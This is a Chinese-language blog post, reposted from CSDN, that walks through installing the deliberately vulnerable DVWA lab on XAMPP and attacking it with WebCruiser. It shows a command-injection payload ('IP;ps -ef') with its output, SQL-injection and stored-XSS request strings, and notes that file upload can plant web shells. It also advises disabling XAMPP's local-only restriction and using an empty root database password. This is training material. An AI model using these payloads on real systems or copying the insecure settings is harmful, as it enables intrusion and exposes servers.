码迷,mamicode.com
首页 > Web开发 > 详细

【网络安全】DVWA和WebCruiser攻击演练过程详解

时间:2015-05-07 18:58:35      阅读:275      评论:0      收藏:0      [点我收藏+]

标签:

1、下载dvwa和xampp linux版本
http://www.dvwa.co.uk/
https://www.apachefriends.org/zh_cn/index.html
2、安装xampp
./xampp.run根据提示进行安装即可,安装后目录为/opt/lampp
./xampp start
./sampp stop
启动后客户端机器远程使用IP地址无法访问xampp服务器(http://192.168.102.4/xampp),vi ./etc/extra/httpd-xampp.conf,注释掉下面的代码重启xampp即可
     61 #<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
     62 #        Require local
     63 #   ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
     64 #</LocationMatch>
看到主界面说明安装成功。
测试数据库连接:./bin目录下用mysql连接数据库
mysql -h localhost -u root
直接进入:执行如下语句成功即可看到数据库信息,说明xampp安装成功
show database();
3、安装dvwa直接解压到./htdocs目录即可,然后利用ip/dvwa目录访问,则提示数据库无法连接,按下面修改即可
vi htdocs/dvwa/config/config.inc.php将下面的密码信息去除改为空密码即可

     16 $_DVWA = array();
     17 $_DVWA[ ‘db_server‘ ] = ‘localhost‘;
     18 $_DVWA[ ‘db_database‘ ] = ‘dvwa‘;
     19 $_DVWA[ ‘db_user‘ ] = ‘root‘;
     20 $_DVWA[ ‘db_password‘ ] = ‘‘;
     
4、进入登录界面http://192.168.102.4/dvwa,需要输入用户名和密码admin/password,将DVWA Security设置为low
5、windows下使用WebCruiser进行主要攻击验证
WebCruiser:http://www.moonsec.com/content/uploadfile/201410/92a41413629442.zip  
a、brute force
暴力破解用户名密码为admin/password ,主要是利用post/get提交username和password数据进行暴力破解。
b、command execute
未对命令进行判断可以执行多条命令
输入:192.168.102.4;ps -ef

PING 192.168.102.4 (192.168.102.4) 56(84) bytes of data.
64 bytes from 192.168.102.4: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 192.168.102.4: icmp_seq=2 ttl=64 time=0.024 ms
64 bytes from 192.168.102.4: icmp_seq=3 ttl=64 time=0.036 ms

--- 192.168.102.4 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.019/0.026/0.036/0.008 ms
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 1月07 ?       00:00:36 /usr/lib/systemd/systemd --switched-root --system --deserialize 19
root         2     0  0 1月07 ?       00:00:00 [kthreadd]
root         3     2  0 1月07 ?       00:00:08 [ksoftirqd/0]
root         5     2  0 1月07 ?       00:00:00 [kworker/0:0H]
root         7     2  0 1月07 ?       00:00:08 [migration/0]
root         8     2  0 1月07 ?       00:00:00 [rcu_bh]
root         9     2  0 1月07 ?       00:11:38 [rcu_sched]
root        10     2  0 1月07 ?       00:00:44 [watchdog/0]
root        11     2  0 1月07 ?       00:00:28 [watchdog/1]
root        12     2  0 1月07 ?       00:00:06 [migration/1]
root        13     2  0 1月07 ?       00:00:08 [ksoftirqd/1]
root        15     2  0 1月07 ?       00:00:00 [kworker/1:0H]
root        16     2  0 1月07 ?       00:00:28 [watchdog/2]
root        17     2  0 1月07 ?       00:00:06 [migration/2]
root        18     2  0 1月07 ?       00:00:07 [ksoftirqd/2]
root        20     2  0 1月07 ?       00:00:00 [kworker/2:0H]
root        21     2  0 1月07 ?       00:00:27 [watchdog/3]
root        22     2  0 1月07 ?       00:00:06 [migration/3]
root        23     2  0 1月07 ?       00:00:13 [ksoftirqd/3]
root        25     2  0 1月07 ?       00:00:00 [kworker/3:0H]
root        26     2  0 1月07 ?       00:00:59 [watchdog/4]
root        27     2  0 1月07 ?       00:00:07 [migration/4]
root        28     2  0 1月07 ?       00:00:02 [ksoftirqd/4]
root        30     2  0 1月07 ?       00:00:00 [kworker/4:0H]
root        31     2  0 1月07 ?       00:02:46 [watchdog/5]
root        32     2  0 1月07 ?       00:00:08 [migration/5]
root        33     2  0 1月07 ?       00:00:02 [ksoftirqd/5]
root        35     2  0 1月07 ?       00:00:00 [kworker/5:0H]
c、Cross Site Request Forgery (CSRF)
没有对输入原密码验证直接判断两个密码是否相等后直接修改密码
d、File Inclusion
通过修改包含文件可以查看到相关文件信息
http://192.168.102.4/dvwa/vulnerabilities/fi/?page=include.php
e、SQL注入
http://192.168.102.4/dvwa/vulnerabilities/sqli/
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=99999999
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033
http://192.168.102.4/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1588033

通过右键sql injection poc进入后可以查看数据库和表及数据信息如图1和2所示

技术分享技术分享

f、盲注
同上面的SQL注入,SQL盲注技术就是一些攻击者使用的新技术,其在错误信息被屏蔽的情况下使攻击者仍能获得所需的信息,耗费时间较长。
g、跨站
一种是反射跨站,一种是存储跨站
反射:XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS
存储:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码

引用是来自其它网站或服务器的地址链接
http://192.168.102.4/dvwa/vulnerabilities/xss_s/^btnSign=Sign Guestbook&mtxMessage=WCRTEXTAREATESTINPUT9749323&txtName=3075018<img src=0 onerror="alert(7795171)">
输入<img src=0 onerror="alert(‘jhelloyhellohhello‘)">后存储到服务器上
还有一个Dom XSS:DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情
技术分享
h、文件上传
通过上传的错误信息可以查看到文件上传的目录,如果上传成功可以上传小马和大马从而攻陷整个机器
Warning: move_uploaded_file(../../hackable/uploads/wenjin_crack.pcap): failed to open stream: Permission denied in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7
Warning: move_uploaded_file(): Unable to move ‘/opt/lampp/temp/php1FMFHK‘ to ‘../../hackable/uploads/wenjin_crack.pcap‘ in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7

【网络安全】DVWA和WebCruiser攻击演练过程详解

标签:

原文地址:http://blog.csdn.net/jiayanhui2877/article/details/45563049

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!